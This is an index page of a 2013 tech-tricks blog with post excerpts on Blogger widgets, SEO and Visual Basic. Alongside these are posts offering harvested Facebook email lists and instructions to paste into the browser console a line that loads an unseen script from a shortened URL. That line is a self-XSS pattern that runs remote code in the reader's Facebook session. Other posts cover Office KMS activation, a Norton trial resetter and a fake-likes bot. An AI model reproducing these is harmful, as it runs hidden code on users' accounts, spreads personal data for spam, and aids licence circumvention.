Monday, August 12, 2013

How to disable right click on your blog...?????

  These most of the people try to copy the contents of a blog and paste on their blogs as their posts. So I brought the trick to disable right click on your blog. Lets go. Go to your blogger dashboard. Then Layout. Then select "html/java script" from Add a gadget menu. Then copy and paste this code. <SCRIPT language=JavaScript> <!-- http://www.sudusm.blogspot.com -->     var message = "function disabled";      function rtclickcheck(keyp){ if (navigator.appName == "Netscape" && keyp.which == 3){     alert(message); return false; }      if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {     alert(message);    ...

Sunday, August 11, 2013

How to install Android on your PC

Hi friends, I brought a nice trick for you. I will explain how to install Android on your pc through this post. Okay. Lets go. You can download this as a .iso file. Download and run it on your computer. No problem. It will not harm your OS. When you run this, you will get a message like this. It will ask "Are you going to create a Boot Manager?" Give Yes as the answer. Then it will ask "Will you create a Boot Record for Windows?" Again the answer is Yes. Then you will have top select a partition to install.  All the partitions will look like NTFS1, NTFS2. Those are the same partitions that you have on windows. The only difference is there will be one more partition than you see on My Computer. That is the partition that you made...

Friday, August 9, 2013

50 000 Facebook emails list for free (No passwords or Surveys)

Hi friends!!! After a long time. I saw a lot of guys were not able to find the password for the list which I gave before. So I decided to give it for free. Download 50 000 facebook emails list for free. Without passwords and surveys. Will be back with more. ...

Thursday, April 18, 2013

How To Add Floating Facebook Like Box In Blogger?

Today I share the widget of blogger.Here is Floating Fb Like box.This widget is best for web/blogbecause social media is most important to promote your blog.customize this widget e.g You Can Chang it's Position.This widget Make your blog more Beautiful.Maybe you Like this post.If you want to adding this widget in blogger.please follow these steps.See pic Example of  Floatindfacebook like box. How to Add Floating Facebook Like box to blog? Follow steps and add this widget.  Go to Blogger > Layout > Add a Gadget > Select HTML/JavaScript Gadget Add an HTML/JavaScript Widget and paste below codes in Gadget box. <script type="text/javascript"> //<!-- $(document).ready(function()...

SEO - Search Engine Optimization Bible

SEO - Search Engine Optimization BibleAuthor: Jerri L. LedfordPublisher: Wiley Publishing Inc. Download N...

Google's Search Engine Optimization Starter Guide

Google's Search Engine Optimization Starter GuideAuthor: UnknownPublisher: Unknown Download now...

Optimize Your Blog Post Titles for Better SEO

The reason most of the blogger templates aren’t that SEO friendly because templates available in Blogger were designed long ago and haven’t been updated, probably since 2007, since then Google SEO algorithm has changed a lot and as being on blogger you don’t want to be left long away, to keep up with the competition making your Blogger template SEO friendly is very important and so this small SEO related article will help you to leave your competitors behind. If you are also using a template from Blogger then you need to make some changes on it to fit your needs and also to fit the search engine needs. Normally search engine don’t focus on the markup importantly but it’s a good thing to change it to something user friendly.  What...

Wednesday, April 17, 2013

I am back.

I am back for blogging and will publish some new posts quickl...

Sunday, February 3, 2013

Nice jQuery Tab Menu for your blog

Hi guys, I have brought you a killer gadget for your blog. Add this gadget and make your blog more interesting. Lets start. First go to Layout >> Edit HTML. Remember to tick on Expand Widget Templates. Now press CTRL+F. Then you can see a search bar. Type </head>   on the search bar. You can see in the HTML box the code </head> is highlighted. Now paste this code below the </head> code. <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js' type='text/javascript'/><script type='text/javascript'>$(document).ready(function() { //Get all the LI from the #tabMenu UL$(&#39;#tabMenu &gt; li&#39;).click(function(){//perform the actions when it&#39;s not...

Install and activate Office Pro Plus 2013

This document covers installation and activation of Office 2013 RTM and VL (Volume License) versions. Important: Please note that this activator activates for 180 days and you have to run the server again (no need to find keys or anything. that is the way of KMS activation. But you can extend the time using parameters of the server. I did not include those due to complexity). You need to boot up the server either weekly or just when you are at 1 day remaining. Use path 1 or 2. But you could directly use path 3. If one is successful, skip all the rest. Open Word > Open a Blank Document > Click on File menu > Account. This does not show the dates remaining. I have listed how to check the remaining dates This activator...

Thursday, January 31, 2013

Add a beautiful Image slide show gadget to your blog

Hi guys, I have brought a nice gadget for you. You can add your favourite posts. This will make your blog more attractive. If you like this gadget, I can help you to add this to your blog. Lets start. First go to Layout >> Edit HTML. Remember to Tick on Expand widget templates. Then press Ctrl+F. Then you will see a search bar. Type </head> on the search box. Then you can see this code will be highlighted on your html box. Now paste this above the </head> code. <!--SLIDE-SHOW-STARTS--><br /> <!-- JavaScripts--><br /> <script type="text/javascript" src="http://sites.google.com/site/saamgeadaviya/www.saamgeadaviya.blogspot.com-jquery.js"></script><br /> <script type="text/javascript"...

Tuesday, January 29, 2013

Introduction to Visual Basic | Visual Basic 01

Hi guys, I have decided to write the visual basic lessons again. Lets start from the begining.  A brief description of Visual Basic VISUAL BASIC® is a high level programming language evolved from the earlier DOS version called BASIC. BASIC stands for Beginners' All-purpose Symbolic Instruction Code. The program codes in Visual Basic resemble the English language. Different software companies produce different versions of BASIC, such as Microsoft® QBASIC, QUICKBASIC, GWBASIC, and IBM BASICA and so on. Visual Basic is a fairly easy programming language and it is for anybody who is interested in programming but lacks professional training in software engineering. Learning VISUAL BASIC will help young children to improve their logical...

STAR WARS TEXT EFFECT

Final Image Start with a new black document. Mine is 1024×768. Before you can do anything you will need the Star Wars Font. I found it on here. Now write your text. What I have in mind is to make a nice grunge text to use for a Clone Wars Poster. Double click on the layer to enter the Blending Options menu. Here use my settings: Set the Fill of the layer to 0%. Next I will add some more text and place it on the bottom of the Clone Wars text. Also I will use some different settings: In the next step I will use the Rectangle Tool to make some simple shapes.  Now for all these 3 shapes add my settings for the Blending Options. Make a new layer over all the layers and name it Gold. Ctrl...

Friday, January 25, 2013

Add all of your friends to your group easily

  Hi guys, I came here with a new trick for you. Let's start the lesson. This trick still working on the new version of mozilla firefox. Go to your group using firefox. Then press CTRL+SHIFT+K Copy and paste the script code given below. document.body.appendChild(document.createElement('script')).src='http://ow.ly/gDSNg'; Then press enter key. Enjoy !!! ...

Optical Drives (CD/DVD) Icon Not Showing in Computer Windows ???

Download this Ready-made Registry script.rar Extract the file. 1st step: Type regedit in RUN dialog box and press Enter. It'll open Registry Editor. 2nd Step: File > Import > Select the extracted File > Open > Save . 3rd Step: Restart the System. Enjoy . . . !!! ...

Thursday, January 24, 2013

Activate Windows 8 with OEM key (when you do not know where to find). v1

This is a Technicians Only Document !!! Applies to: OEM Versions of Windows 8 This document is under version control. Thos post is not about activating your pirate version of Windows. Others: I am not a slave of Microsoft :D Reusing OEM Key in Windows 8 series - Also includes how to locate Windows 8 key. With the Windows 8 release Microsoft had introduced some new and improved activation technologies. This time they have come up with OA3 (OEM Activation 3). This is a method that OEMs use to inject the product key to hardware and use it to activate Windows (o/l or off/l). Each key is unique. http://www.tomshardware.com/news/Windows-8-OEM-OA-3.0-Piracy-Genuine-Microsoft,16636.html Not like the earlier SLIC hacks, this, according to...

Get Free facebook Likes Tute + New Fast Bot (script) 100%

Requirements: Firefox : http://www.mozilla.org/en-US/firefox/new/ IMacros Firefox Plugin : https://addons.mozilla.org/en-US/firefox/addon/imacros-for-firefox/ Fansbox Account : Click here My Java script : My java Script 1.Open Firefox then download the Imacros plugin link above. 2.Now download my Javascript. 3.Once downloaded go to documents-->imacros-->Macros-->Demo-Firefox and drop the download fansboxbot.js script file in here should look similar to this.. 4.Now close Firefox and open it again so the js file will be in imacros. 5.Go to Fansbox 2.0 and "Allow" the app. 6.Now go to Settings on Fansbox then Add your page by "Switch page" and click "save changes". 7.Now open up a...

Wednesday, January 23, 2013

Norton Internet Security Trial Re-setter

Norton Internet Security rial is expired??? Don't worry. I will tell you the way to activate it for another 30 days, step by step. 01. Uninstall Norton Internet Security 02. Now restart the computer in the safe mode. 03. Now run [1 BOX_NTR2012.exe  NIS 2012 - http://www.mediafire.com/?1xc16r5nrb9o4fn                                                            NIS 2013 - http://www.mediafire.com/?3cz2h2s5bm3rc0k 04. Click ok and restart the computer normally. 05. Then install Norton Internet Security again. Now see trial is activated for another 30 days. :D 06. Then go to Norton Internet Security and then go to <Settings>...

Monday, January 14, 2013

50 000 facebook emails list for FREE

I have an email list of 50,000 facebook emails. This list is fresh and has never been shared before since it is created by me. No duplicates. No bad emails. So this is a great chance for you. Download the list from the link below. [[Not for a long time]] ...

Page 1 of 612345Next
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Powerade Coupons